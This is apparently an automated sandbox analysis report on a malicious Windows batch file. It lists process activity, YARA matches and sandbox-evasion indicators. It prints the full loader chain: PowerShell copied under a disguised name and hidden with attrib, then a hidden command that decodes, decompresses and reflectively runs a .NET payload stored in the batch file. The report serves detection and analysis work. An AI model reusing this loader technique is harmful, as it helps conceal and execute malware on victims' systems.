                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuCode function: 7_2_08FF34B07_2_08FF34B0
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuCode function: 7_2_08FF37D77_2_08FF37D7
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuCode function: 7_2_0A767B987_2_0A767B98
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuCode function: 7_2_0A767B887_2_0A767B88
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuCode function: 7_2_0A7680887_2_0A768088
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuCode function: 7_2_0A7661407_2_0A766140
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuCode function: 7_2_0A7661307_2_0A766130
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuCode function: 7_2_0AB7001B7_2_0AB7001B
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuCode function: 7_2_0AB700407_2_0AB70040
                Source: INQ24-0122070030786451.bat.IzuBinary or memory string: OriginalFilename vs INQ24-0122070030786451.bat
                Source: INQ24-0122070030786451.bat.Izu, 00000007.00000002.2114245820.00000000052A5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs INQ24-0122070030786451.bat
                Source: INQ24-0122070030786451.bat.Izu, 00000007.00000002.2114245820.0000000005241000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs INQ24-0122070030786451.bat
                Source: INQ24-0122070030786451.bat.Izu, 00000007.00000002.2114245820.00000000057CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs INQ24-0122070030786451.bat
                Source: INQ24-0122070030786451.bat.Izu, 00000007.00000000.2064692219.0000000000A54000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamePowerShell.EXEj% vs INQ24-0122070030786451.bat
                Source: INQ24-0122070030786451.bat.Izu, 00000007.00000002.2143414095.000000000A710000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs INQ24-0122070030786451.bat
                Source: INQ24-0122070030786451.bat.Izu, 00000007.00000002.2113215616.000000000324B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs INQ24-0122070030786451.bat
                Source: INQ24-0122070030786451.bat.Izu, 00000007.00000002.2118916133.0000000006E19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWhaxdle.exe0 vs INQ24-0122070030786451.bat
                Source: INQ24-0122070030786451.bat.Izu, 00000007.00000002.2118916133.0000000006E19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs INQ24-0122070030786451.bat
                Source: INQ24-0122070030786451.bat.Izu, 00000007.00000002.2133984150.0000000008C50000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameWhaxdle.exe0 vs INQ24-0122070030786451.bat
                Source: INQ24-0122070030786451.bat.Izu.4.drBinary or memory string: OriginalFilenamePowerShell.EXEj% vs INQ24-0122070030786451.bat
                Source: Process Memory Space: INQ24-0122070030786451.bat.Izu PID: 6600, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: classification engineClassification label: mal96.evad.winBAT@12/5@0/0
                Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3596:120:WilError_03
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o1aylkvg.cqn.ps1Jump to behavior
                Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\INQ24-0122070030786451.bat" "
                Source: C:\Windows\System32\chcp.comKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuFile read: C:\Users\user\Desktop\INQ24-0122070030786451.batJump to behavior
                Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\INQ24-0122070030786451.bat" "
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo F "
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\xcopy.exe xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\user\Desktop\INQ24-0122070030786451.bat.Izu
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +s +h C:\Users\user\Desktop\INQ24-0122070030786451.bat.Izu
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Desktop\INQ24-0122070030786451.bat.Izu C:\Users\user\Desktop\INQ24-0122070030786451.bat.Izu -WindowStyle hidden -command "$Hohcwatlus = get-content 'C:\Users\user\Desktop\INQ24-0122070030786451.bat' | Select-Object -Last 1; $Qlhoh = [System.Convert]::FromBase64String($Hohcwatlus);$Mvwalaytoyd = New-Object System.IO.MemoryStream( , $Qlhoh );$Myhbvcux = New-Object System.IO.MemoryStream;$Uvlejdiywlp = New-Object System.IO.Compression.GzipStream $Mvwalaytoyd, ([IO.Compression.CompressionMode]::Decompress);$Uvlejdiywlp.CopyTo( $Myhbvcux );$Uvlejdiywlp.Close();$Mvwalaytoyd.Close();[byte[]] $Qlhoh = $Myhbvcux.ToArray();[Array]::Reverse($Qlhoh); $Rbyymtwxmx = [System.AppDomain]::CurrentDomain.Load($Qlhoh); $Qokucu = $Rbyymtwxmx.EntryPoint; $Qokucu.DeclaringType.InvokeMember($Qokucu.Name, [System.Reflection.BindingFlags]::InvokeMethod, $null, $null, $null)| Out-Null"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo F "Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\xcopy.exe xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +s +h C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Desktop\INQ24-0122070030786451.bat.Izu C:\Users\user\Desktop\INQ24-0122070030786451.bat.Izu -WindowStyle hidden -command "$Hohcwatlus = get-content 'C:\Users\user\Desktop\INQ24-0122070030786451.bat' | Select-Object -Last 1; $Qlhoh = [System.Convert]::FromBase64String($Hohcwatlus);$Mvwalaytoyd = New-Object System.IO.MemoryStream( , $Qlhoh );$Myhbvcux = New-Object System.IO.MemoryStream;$Uvlejdiywlp = New-Object System.IO.Compression.GzipStream $Mvwalaytoyd, ([IO.Compression.CompressionMode]::Decompress);$Uvlejdiywlp.CopyTo( $Myhbvcux );$Uvlejdiywlp.Close();$Mvwalaytoyd.Close();[byte[]] $Qlhoh = $Myhbvcux.ToArray();[Array]::Reverse($Qlhoh); $Rbyymtwxmx = [System.AppDomain]::CurrentDomain.Load($Qlhoh); $Qokucu = $Rbyymtwxmx.EntryPoint; $Qokucu.DeclaringType.InvokeMember($Qokucu.Name, [System.Reflection.BindingFlags]::InvokeMethod, $null, $null, $null)| Out-Null"Jump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
                Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
                Source: C:\Windows\System32\xcopy.exeSection loaded: ulib.dllJump to behavior
                Source: C:\Windows\System32\xcopy.exeSection loaded: ifsutil.dllJump to behavior
                Source: C:\Windows\System32\xcopy.exeSection loaded: devobj.dllJump to behavior
                Source: C:\Windows\System32\xcopy.exeSection loaded: fsutilext.dllJump to behavior
                Source: C:\Windows\System32\xcopy.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dllJump to behavior
                Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dllJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuSection loaded: atl.dllJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuSection loaded: msisip.dllJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuSection loaded: wshext.dllJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuSection loaded: appxsip.dllJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuSection loaded: opcservices.dllJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: INQ24-0122070030786451.batStatic file information: File size 2039860 > 1048576
                Source: Binary string: powershell.pdbUGP source: INQ24-0122070030786451.bat.Izu, 00000007.00000000.2064268725.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, INQ24-0122070030786451.bat.Izu.4.dr
                Source: Binary string: protobuf-net.pdbSHA256}Lq source: INQ24-0122070030786451.bat.Izu, 00000007.00000002.2114245820.00000000057CB000.00000004.00000800.00020000.00000000.sdmp, INQ24-0122070030786451.bat.Izu, 00000007.00000002.2143414095.000000000A710000.00000004.08000000.00040000.00000000.sdmp, INQ24-0122070030786451.bat.Izu, 00000007.00000002.2118916133.0000000006E19000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: protobuf-net.pdb source: INQ24-0122070030786451.bat.Izu, 00000007.00000002.2114245820.00000000057CB000.00000004.00000800.00020000.00000000.sdmp, INQ24-0122070030786451.bat.Izu, 00000007.00000002.2143414095.000000000A710000.00000004.08000000.00040000.00000000.sdmp, INQ24-0122070030786451.bat.Izu, 00000007.00000002.2118916133.0000000006E19000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: powershell.pdb source: INQ24-0122070030786451.bat.Izu, 00000007.00000000.2064268725.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, INQ24-0122070030786451.bat.Izu.4.dr

                Data Obfuscation

                barindex
                .NET source code contains potential unpacker
                Source: 7.2.INQ24-0122070030786451.bat.Izu.99d7878.4.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                Source: 7.2.INQ24-0122070030786451.bat.Izu.99d7878.4.raw.unpack, ListDecorator.cs.Net Code: Read
                Source: 7.2.INQ24-0122070030786451.bat.Izu.99d7878.4.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                Source: 7.2.INQ24-0122070030786451.bat.Izu.99d7878.4.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                Source: 7.2.INQ24-0122070030786451.bat.Izu.99d7878.4.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                Yara detected Costura Assembly Loader
                Source: Yara matchFile source: 7.2.INQ24-0122070030786451.bat.Izu.a770000.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.INQ24-0122070030786451.bat.Izu.991a058.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.2143947753.000000000A770000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2114245820.00000000057CB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2137479439.0000000009711000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2114245820.0000000005397000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: INQ24-0122070030786451.bat.Izu PID: 6600, type: MEMORYSTR
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuCode function: 7_2_095B593F push 00000028h; retf 7_2_095B5949
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuCode function: 7_2_095B5810 push 00000028h; retf 7_2_095B5812
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuCode function: 7_2_095B5426 push 00000028h; retf 7_2_095B5488
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuCode function: 7_2_0724A259 push esp; ret 7_2_0724A25B
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuCode function: 7_2_0724ADA0 push es; ret 7_2_0724AD6C
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuCode function: 7_2_07242900 push FFFFFFC3h; ret 7_2_07242918
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuCode function: 7_2_08FF887F push 8B044389h; ret 7_2_08FF8889
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuCode function: 7_2_08FF89B3 push 8B044389h; ret 7_2_08FF89B8
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuCode function: 7_2_08FF8936 push 8B045BD9h; ret 7_2_08FF893C
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuCode function: 7_2_08FFDFA6 push es; retf 7_2_08FFDFA7
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuCode function: 7_2_08FF85DE pushad ; retf 7_2_08FF85DF
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuCode function: 7_2_08FF8652 pushad ; retf 7_2_08FF8659
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuCode function: 7_2_08FF8724 push 8B044388h; ret 7_2_08FF8742
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuCode function: 7_2_0A76B27C push ss; iretd 7_2_0A76B27F
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuCode function: 7_2_0AB735E8 push ds; retf 7_2_0AB735EB
                Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuJump to dropped file
                Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuJump to dropped file
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: INQ24-0122070030786451.bat.Izu PID: 6600, type: MEMORYSTR
                Powershell is started from unusual location (likely to bypass HIPS)
                Source: c:\users\user\desktop\inq24-0122070030786451.bat.izuKey value queried: Powershell behaviorJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                Source: INQ24-0122070030786451.bat.Izu, 00000007.00000002.2114245820.00000000057CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                Source: INQ24-0122070030786451.bat.Izu, 00000007.00000002.2114245820.00000000057CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLLT-]Q@
